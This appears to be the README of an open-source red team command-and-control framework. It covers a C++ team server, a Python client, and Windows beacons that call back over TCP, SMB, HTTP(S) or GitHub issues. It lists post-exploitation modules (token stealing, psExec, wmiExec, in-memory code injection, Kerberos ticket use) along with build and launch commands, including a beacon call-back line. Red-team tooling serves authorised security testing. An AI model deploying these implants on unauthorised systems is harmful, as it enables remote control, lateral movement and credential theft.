Exploration is a rudimentary red team command and control framework.
This repository contains the TeamServer and the Client.
The TeamServer is a stand alone application, coded in c++, that handle listeners. The client, coded in python, communicate with the TeamServer through GRPC.
Beacons run on the victime host. Each Beacons which connects back to the TeamServer open a new session. This session is used to control the Beacon, send commands and receive results.
Listener and Beacons can communicate through TCP, SMB, HTTP ,HTTPS and Github issues depending on the situation.
A compiled static version of the TeamServer is ready to use in Release, with some default certificats for GRPC communication and HTTP Listener:
The TeamServer binary is in ./Release/TeamServer
it's launched using
./TeamServer
The Python Client is in ./Release/Client It's launched using 'python3 GUI.py'
python3 GUI.py
4 types of listeners are available from the TeamServer: HTTP, HTTPS that start a web server on the given port, TCP that start a TCP server on the given port and GitHub that use GitHub issues from a project like "maxDcb/C2TeamServer" and a personal access token (with issues write rights).
Winodws Beacons and command modules are compiled separately in another project, but a compiled version is provided in ./Release/Beacons and ./Release/Modules to be able to use it directly.
.\BeaconHttp.exe 10.10.52.5 8443 https
When the Beacon is started and connect to the TeamServer, a new session is started from where you can interact with the Beacon:
Windows beacon uses primarily windows API and start with no module loaded. Modules are loaded at runtime using "MemoryModule" project to load DLL sent by the TeamServer to the beacon.
| Modules |
|---|
| assemblyExec |
| upload |
| download |
| run |
| script |
| inject |
| pwd |
| cd |
| ls |
| ps |
| makeToken |
| rev2self |
| stealToken |
| coffLoader |
| loadModule |
| powershell |
| kerberosUseTicket |
| psExec |
| wmiExec |
| spawnAs |
| chisel |
| tree |
AssemblyExec & Inject, that use Donut project, make it possible to launch binary EXE, DLL, managed or unmanaged direclty from memory on the remote host.
Coff, that use COFFLoader project, is used to run Coff files.
Two side projects can be used to deliver the beacons:
A very basic Linux Beacons coded in python and can be found here: C2ImplantPy.
An other very basic Linux Beacons coded in Nim and can be found here: C2ImplantPy.
- Donut: Creat shellcode from PE files.
- cpp-httplib: Http and Https Listener.
- CoffLoader: Run object files from CS-Situational-Awareness-BOF.
- MemoryModule: Load DLL at runtime.
- UnmanagedPowerShell: Powershell for unmanaged code.
- cpp-base64: base64.
- json: json parser.
sudo apt install gcc-mingw-w64
sudo apt install g++-mingw-w64
sudo apt install golang-cfssl
sudo apt install cmake
pip3 install pycryptodome
pip install conan
pip install grpcio
pip install PyQt5
pip install pyqtdarktheme
pip install protobuf
conan profile detect
git clone https://github.com/maxDcb/C2TeamServer.git
cd C2TeamServer
git submodule update --init
mkdir build
cd build
cmake ..
make -j4
The TeamServer binary is in ./Release/TeamServer
it's launched using './TeamServer'
The Python Client is in ./Release/Client
It's launched using 'python3 GUI.py'
